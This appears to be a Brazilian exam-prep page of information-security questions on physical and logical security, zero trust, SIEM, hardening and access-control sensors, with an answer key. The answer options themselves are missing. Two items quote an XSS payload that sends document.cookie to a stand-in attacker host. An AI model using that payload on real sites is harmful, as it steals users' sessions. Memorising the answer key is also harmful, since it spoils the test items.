Questões de Concurso Comentadas sobre segurança física e lógica em segurança da informação

Foram encontradas 137 questões

Q2171813 Segurança da Informação
Sobre a segurança física de redes, analise as assertivas abaixo e assinale a alternativa correta.
I. O objetivo da segurança física é de obter a integridade dos equipamentos e dispositivos que estão dentro da rede da empresa.
II. Ter sistema de refrigeração dentro da sala de servidores é uma medida de segurança física.
III. Utilizar parafusos com cabeça lisa para prender roteadores e switches não pode ser considerada uma medida de segurança física.
IV. O servidor redundante pode ser instalado e configurado para o único propósito de acesso à Internet.
Alternativas
Q2171811 Segurança da Informação
Sobre segurança de redes, analise as assertivas abaixo e assinale V, se verdadeiras, ou F, se falsas.
( ) Conforme o conceito de segurança física, para todos os dispositivos de uma rede, há uma maneira de se fazer segurança.
( ) Equipamentos e dispositivos que ficam perto dos colaboradores da empresa devem ser filmados e monitorados por sistemas de segurança.
( ) Sobre a atualização das versões dos softwares, quando homologados, os testes são dispensados.
( ) Embora o cabeado esteja internamente no piso ou na parede, devem ser testados periodicamente.
A ordem correta de preenchimento dos parênteses, de cima para baixo, é:
Alternativas
Q4048021 Segurança da Informação
    Quando se trata de segurança da informação, a proteção se aplica tanto ao hardware (que são os equipamentos), quanto ao software (como aplicativos e dados). Nesse último caso, a segurança da informação está na preservação das informações do sistema contra qualquer ataque que possa causar perda, alteração ou compartilhamento de dados sem a devida autorização do responsável.
    A segurança da informação tem o objetivo principal de garantir não apenas a segurança lógica, mas também a segurança física, que é tão importante quanto. A segurança física é a base para a proteção de qualquer investimento feito por uma organização.
    O bem mais importante de uma organização não é o produto ou o serviço em si. São os conhecimentos de como se produz, quais são as competências e as habilidades exigidas para isso. Sem informação, a empresa, independentemente de seu ramo de atuação, não realiza seu negócio e não se mantém no mercado.
    A segurança da informação tem um valor inestimável para as empresas. O grau de risco à segurança da informação é resultado do conhecimento da instituição sobre as ameaças e quanto isto representa de vulnerabilidade. Ou seja, quanto menos se conhece sobre as ameaças, maior a sua vulnerabilidade.
    A segurança depende de vários fatores: o meio de transmissão, a forma de armazenamento e processamento, as medidas de segurança (tecnologias, políticas e procedimentos) e, principalmente, da conscientização de todos os envolvidos.
    É importante estar ciente de que não existe risco zero: os riscos sempre vão existir em qualquer meio. A segurança da informação não aumentará apenas com uso de tecnologias ou com a criação de leis. É fundamental compreender o problema e mudar a forma tanto de usar quanto de desenvolver a tecnologia.
(Disponível em: https://lms.ev.org.br. Adaptado.)

Considerando as disposições textuais e a aplicação da segurança da informação na Fundação Parque Tecnológico Itaipu-Brasil, assinale a afirmativa correta.
Alternativas
Q1999309 Segurança da Informação
Considere o contexto da Resolução nº 396 de 07/06/2021. A ENSEC-PJ prevista nesta Resolução contempla:

I. temas relacionados à segurança da informação, de forma ampla, que sejam essenciais para segurança cibernética.
II. segurança lógica e proteção de dados específicos do nível operacional, nos aspectos relacionados aos requisitos funcionais.
III. segurança física e proteção de ativos de tecnologia da informação de forma geral;
IV. ações destinadas a assegurar, de forma automatizada, a não invasão física de localidades e de informações.

Está correto o que consta APENAS de
Alternativas
Q1964555 Segurança da Informação

Com relação à segurança da informação, julgue o item seguinte.



Os detectores de incêndio são mecanismos eletrônicos que acionam alarmes em casos de fogo nas instalações e, nessa situação, funcionam como soluções de segurança digital de ambientes de TI.

Alternativas
Q1957597 Segurança da Informação
A arquitetura Zero Trust é um paradigma de cibersegurança focado na proteção e na premissa de que a confiança nunca é garantida implicitamente. Assinale a alternativa que representa os objetivos da arquitetura. 
Alternativas
Q1952476 Segurança da Informação
Em uma arquitetura zero trust para proteção de perímetro, o elemento lógico que tem a função de tomar a decisão final de acesso a um recurso para determinada ação denomina-se
Alternativas
Q1952474 Segurança da Informação

Uma área de escritório de determinada empresa é definida como de alta criticidade, tal que somente uma pequena parte de funcionários deve ter acesso às informações confidenciais utilizadas nesse ambiente.


Nessa situação, para controlar a segurança física na área em questão, é correto

Alternativas
Q1952473 Segurança da Informação
Entre as diretrizes para a implementação da segurança de perímetro, utilizada para proteger instalações de processamento de informação, inclui-se
Alternativas
Q1894520 Segurança da Informação

Com relação à segurança física e lógica e à operação de segurança da informação, julgue o item a seguir.  


A proteção de perímetro é usada para dissuadir invasões e para possibilitar que as pessoas utilizem entradas controladas para entrar em uma instalação.  

Alternativas
Q1894519 Segurança da Informação

Com relação à segurança física e lógica e à operação de segurança da informação, julgue o item a seguir.  


A despeito de sua capacidade de agregação e correlação automatizada de dados de eventos provenientes de várias fontes, as soluções SIEM são ineficazes em processos de coleta e verificação de dados de conformidade no âmbito da infraestrutura de negócios. 

Alternativas
Q1868574 Segurança da Informação
O conceito de hardening caracteriza-se principalmente por medidas e ações que visam:
Alternativas
Q1825888 Segurança da Informação

No que se refere a trabalho remoto, rotinas de segurança da informação e recuperação de arquivos, aplicativos para segurança e conformidade, julgue o item subsecutivo.


Recomenda-se a utilização de dois ou mais tipos de software de controle contra malware, durante manutenções e procedimentos de emergência, para aumentar a eficácia no que se refere à proteção contra ameaças.

Alternativas
Q1787567 Segurança da Informação
Julgue o item acerca dos mecanismos de segurança da informação.
As técnicas de substituição são utilizadas pelas máquinas de rotor, que são dispositivos de hardware sofisticados, anteriores ao computador.
Alternativas
Q1768010 Segurança da Informação
No que diz respeito à segurança física de equipamentos de informática, três dispositivos devem ser instalados na entrada da alimentação elétrica de equipamentos de informática, particularmente os servidores de rede. As características de dois desses dispositivos são: I. É o equipamento mais simples, que exerce sua função impedindo que flutuações na corrente elétrica passem diretamente ao sistema causando danos. Nesse dispositivo, o fusível é a única proteção existente. Em caso de uma brusca oscilação de energia ou mesmo queda, o fusível queima e esse dispositivo se sacrifica no lugar do equipamento sob proteção. II. É o equipamento que busca manter a voltagem fornecida pela concessionária de energia elétrica em níveis próximos ao valor nominal. A função é manter a alimentação da carga o mais próximo possível da nominal (110/127V ou 220V). Os dispositivos de proteção descritos em I e II são denominados, respectivamente:
Alternativas
Q1616617 Segurança da Informação

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Muitas aplicações web e APIs não protegem de forma adequada dados sensíveis, como dados financeiros, de saúde ou de identificação pessoal, por isso, para sua proteção, é necessário classificar os dados processados, armazenados ou transmitidos pela aplicação.

Alternativas
Q1616616 Segurança da Informação

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.

Alternativas
Q1310207 Segurança da Informação

Na coluna I, estão determinados sensores e dispositivos que, integrados aos controles de acesso, auxiliam na sua operacionalidade, contribuindo com os objetivos da atividade de segurança. Na coluna II, funcionalidades desses sensores e dispositivos:


I

1. Coletor de cartões.

2. Sensor de tempo de entrada.

3. Sensor de abertura forçada.

4. Sistema de patrulha de guarda.

5. Estouro de porta aberta.


II

a. Permite que as verificações no local protegido não sejam feitas de forma rotineira.

b. Alerta que a abertura não foi franqueada por meio de validação de leitura de acesso.

c. Permite uma barreira móvel não permanecer aberta, aguardando a passagem da pessoa autorizada por alguma leitura de credencial por tempo indeterminado.

d. Gera uma ocorrência caso uma barreira móvel não seja corretamente fechada baseando-se no tempo máximo estimado de passagem.

e. Eficaz para evitar que visitantes temporários levem o dispositivo de identificação e/ou acesso provisório.


A correlação correta entre o sensor ou dispositivo e a funcionalidade está em

Alternativas
Q1741005 Segurança da Informação
O uso dos softwares de recuperação de dados pode ser de grande ajuda para resgatar alguns dados que tenham sido perdidos nesse processo.
Trata(m)-se de desvantagem (ns) do método:
I. Alto custo II. Baixa garantia de sucesso III. Alguns dos arquivos recuperados podem vir corrompidos
Alternativas
Q1166998 Segurança da Informação

Analise as seguintes afirmativas sobre segurança física e lógica:


I- A segurança lógica controla o acesso a aplicativos, dados, sistemas operacionais, senhas e arquivos de log por meio de firewalls de hardwares e softwares, criptografia, antivírus e outras aplicações contra hackers e possíveis invasões às fontes internas da empresa.

II- A segurança física trata de métodos para evitar o acesso de pessoas não autorizadas a áreas em que se encontram dados e informações críticas da empresa. Uma forma de fazer isso é implantar recursos de identificação de funcionários, como o uso de crachás, senhas e cadastro de digitais.

Alternativas
Respostas
61: D
62: B
63: C
64: B
65: E
66: A
67: A
68: A
69: A
70: C
71: E
72: C
73: E
74: C
75: D
76: C
77: C
78: D
79: E
80: C